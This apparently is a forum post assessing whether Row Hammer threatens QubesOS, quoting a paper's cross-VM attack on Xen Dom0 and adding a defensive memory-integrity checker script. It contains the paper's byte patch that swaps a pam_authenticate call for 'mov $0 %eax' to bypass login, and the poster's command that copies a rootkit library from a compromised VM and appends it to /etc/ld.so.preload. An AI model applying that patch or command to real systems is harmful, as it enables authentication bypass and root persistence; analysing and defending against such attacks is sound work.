6.3 Cross-VM Row Hammer Exploitation
[..]
6.3.2 Integrity Attacks
[..]
Particularly, the victim was the management domain in Xen, the Dom0.
[..]
Once the signature was found, the adversary immediately replaced a five-byte
instruction “0xe8 0x1b 0x74 0xfd 0xff” (binary code for “callq pam_authenticate”)
with another five-byte instruction “0xb8 0x00 0x00 0x00 0x00” (binary code for
“mov $0 %eax”). Note here even though the memory page is read-only in the
victim VM, Dom0, the adversary may have arbitrary read/write access to it without
any restriction.
[..]
In the paper the attacker writes to an opensshd process to bypass pam_authenticate().
[..]
The modified code assigned %eax value 0 directly, without calling pam_authenticate(),
so the authentication will be bypassed.
[..]
In Qubes a different process would have to be used, i.e. crond or meminfo-writer. Writing five bytes would not suffice, one needs about 160 bytes or so for
/usr/bin/sh -c "qvm-run --pass-io pwnedVM 'cat /home/user/.badly_hidden_rootkit' > /tmp/librootkit.so && echo /tmp/librootkit.so >> /etc/ld.so.preload"
and another 30 bytes or so to run the execve(char *filename, char **argv, char **envp) syscall.
You can call that privilege escalation if you like, I’d like to call it game over.
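A defender-side check for the integrity attack quoted above, added here as an example that comes neither from the paper nor from this post: it compares each executable, file-backed mapping of a running process with the bytes of the file it was mapped from, and decodes the call-to-mov substitution the paper describes. The function names (`diff_regions`, `describe`, `check_process`) and the sample bytes are my own.

```python
#!/usr/bin/env python3
"""Detect in-memory code that no longer matches its on-disk ELF (added example).
A Row Hammer integrity attack rewrites a read-only code page in DRAM, so the
bytes in the process differ from the file they were mapped from."""
import struct
import sys
from typing import List, Tuple

Region = Tuple[int, bytes, bytes]  # (offset in mapping, on-disk bytes, in-memory bytes)

def diff_regions(disk: bytes, mem: bytes) -> List[Region]:
    """Return every contiguous run of bytes where memory differs from the file."""
    if len(disk) != len(mem):
        raise ValueError("buffers must cover the same byte range")
    regions: List[Region] = []
    i, n = 0, len(disk)
    while i < n:
        if disk[i] == mem[i]:
            i += 1
            continue
        j = i
        while j < n and disk[j] != mem[j]:
            j += 1
        regions.append((i, disk[i:j], mem[i:j]))
        i = j
    return regions

def describe(region: Region, map_start: int) -> str:
    """Explain a patch; 'call rel32' -> 'mov $imm32,%eax' is the case the paper uses."""
    off, old, new = region
    if len(old) == 5 and old[0] == 0xE8 and new[0] == 0xB8:
        rel = struct.unpack("<i", old[1:])[0]    # call target is relative to the next instruction
        imm = struct.unpack("<I", new[1:])[0]    # forged return value loaded into %eax
        target = map_start + off + 5 + rel
        return f"{map_start + off:#x}: call {target:#x} replaced by mov ${imm:#x},%eax"
    return f"{map_start + off:#x}: {old.hex()} -> {new.hex()}"

def check_process(pid: int) -> List[str]:
    """Compare every executable file-backed mapping of pid with its backing file (needs ptrace rights)."""
    findings: List[str] = []
    with open(f"/proc/{pid}/maps") as maps, open(f"/proc/{pid}/mem", "rb") as mem:
        for line in maps:
            fields = line.split()
            if len(fields) < 6 or "x" not in fields[1] or not fields[5].startswith("/"):
                continue  # skip anonymous, non-executable and pseudo mappings
            start, end = (int(x, 16) for x in fields[0].split("-"))
            with open(fields[5], "rb") as f:
                f.seek(int(fields[2], 16))
                disk = f.read(end - start)
            mem.seek(start)
            findings += [describe(r, start) for r in diff_regions(disk, mem.read(len(disk)))]
    return findings

if __name__ == "__main__":
    print("\n".join(check_process(int(sys.argv[1]))) or "no differences found")
```

Run it as root against the PID of a long-lived process such as crond; any output line is a code page that no longer matches the binary on disk.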
7 Discussion on Existing Countermeasures
Row hammer resistance with hardware-assisted virtualization.
[..]
One way to prevent physical address disclosure to guest VMs is to adopt
hardware-assisted virtualization, such as Intel’s VT-x [31] and AMD’s AMD-V [2].
[..]
Good to know. So we could answer the question if RowHammer poses a threat to QubesOS with:
To our best knowledge it does not if you use Qubes 4.1+ with HVMs and PVHs only.
edit: no sudo needed as crond and meminfo-writer already run as root.